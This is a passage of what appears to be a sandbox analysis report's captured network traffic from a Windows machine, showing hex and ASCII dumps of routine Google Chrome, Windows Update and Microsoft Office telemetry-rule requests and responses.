\u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 37 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700327,3700949,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2024-12-08 18:52:13 UTC	1092	IN	Data Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor
2024-12-08 18:52:13 UTC	461	IN	Data Raw: 31 63 36 0d 0a 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 54 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 54 64 5c 75 30 30 33 64 53 64 28 29 29 3b 72 65 74 75 72 6e 20 54 64 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 55 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 56 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 Data Ascii: 1c6-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Ud\u003dfunction(){Td\u003d\u003d\u003dvoid 0\u0026\u0026(Td\u003dSd());return Td};\n_.Wd\u003dfunction(a){const b\u003d_.Ud();return new _.Vd(b?b.createScriptURL(a):a
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c Data Ascii: 8000throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6c 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6c 65 5b 64 5d 2c 63 29 3a 5f 2e 67 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 67 65 28 64 2c 5c 22 64 61 Data Ascii: \|null};\n_.me\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:le.hasOwnProperty(d)?a.setAttribute(le[d],c):_.ge(d,\"aria-\")\|\|_.ge(d,\"da

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	216.58.208.228	443	7860	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:13 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-08 18:52:13 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 08 Dec 2024 18:52:13 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 18:52:13 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-08 18:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OBm961D2gu3cWPK&MD=+Mp5K1lN HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-08 18:52:20 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 3addb9b5-1d22-4f50-bedd-ee2d59ef7f15 MS-RequestId: 9d8ad8df-2007-4725-a4c0-45c766eb43d3 MS-CV: djqBePUiMU6YQKxc.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 08 Dec 2024 18:52:19 GMT Connection: close Content-Length: 24490
2024-12-08 18:52:20 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-12-08 18:52:20 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49759	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:59 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OBm961D2gu3cWPK&MD=+Mp5K1lN HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-08 18:53:00 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: f5fdf527-fd06-43e7-8035-eb7acc05bc0e MS-RequestId: 637bbcfd-23a3-4dd4-85d6-580d94aa5c4a MS-CV: Oeq4rfICzEqK0NWn.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 08 Dec 2024 18:52:59 GMT Connection: close Content-Length: 30005
2024-12-08 18:53:00 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-12-08 18:53:00 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49760	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:01 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:02 UTC	471	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:02 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 07 Dec 2024 15:08:57 GMT ETag: "0x8DD16D112C941E3" x-ms-request-id: 2bf777ac-301e-0099-29dd-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185302Z-r1cf579d778t5c2lhC1EWRce3w00000006wg0000000029c5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:02 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" 